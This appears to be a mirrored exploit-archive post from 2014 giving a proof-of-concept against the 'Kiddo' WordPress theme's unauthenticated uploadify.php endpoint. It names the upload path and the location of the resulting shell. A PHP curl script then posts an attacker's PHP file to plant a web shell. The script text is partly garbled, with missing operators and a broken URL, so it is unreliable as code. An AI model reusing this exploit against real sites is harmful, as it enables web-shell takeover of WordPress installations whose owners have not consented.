facebook facebook twitter rss

Kidoo WP Theme File Upload Vulnerability

Author: TUNISIAN CYBER , Published: 09-02-2014

<?php

*/
[+] 
AuthorTUNISIAN CYBER
[+] Exploit TitleKidoo WP Theme File Upload Vulnerability
[+] Date05-02-2014
[+] CategoryWebApp
[+] Google Dork: :(
[+] 
Tested onKaliLinux
[+] Vendorn/a
[+] Friendly Sitesna3il.com,th3-creative.com

Kiddo WP theme suffers from a File Upload Vulnerability

+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php

+Shell Path:
site/3vil.php

ScreenShot
:
http://i.imgur.com/c62cWHH.png

Greets toXMaX-tnN43il HacK3rXtechSEt
Sec4Ever Members
:
DamaneDz
UzunDz
GEOIX
E4A Members
:
Gastro-DZ

*/

echo 
"=============================================== \n";
echo 
"   Kiddo WP Theme File Upload Vulnerability\n";
echo 
"                 TUNISIAN CYBER   \n";
echo 
"=============================================== \n\n";  
$uploadfile="cyber.php";
 
$ch curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
 
?>

Like us on Facebook :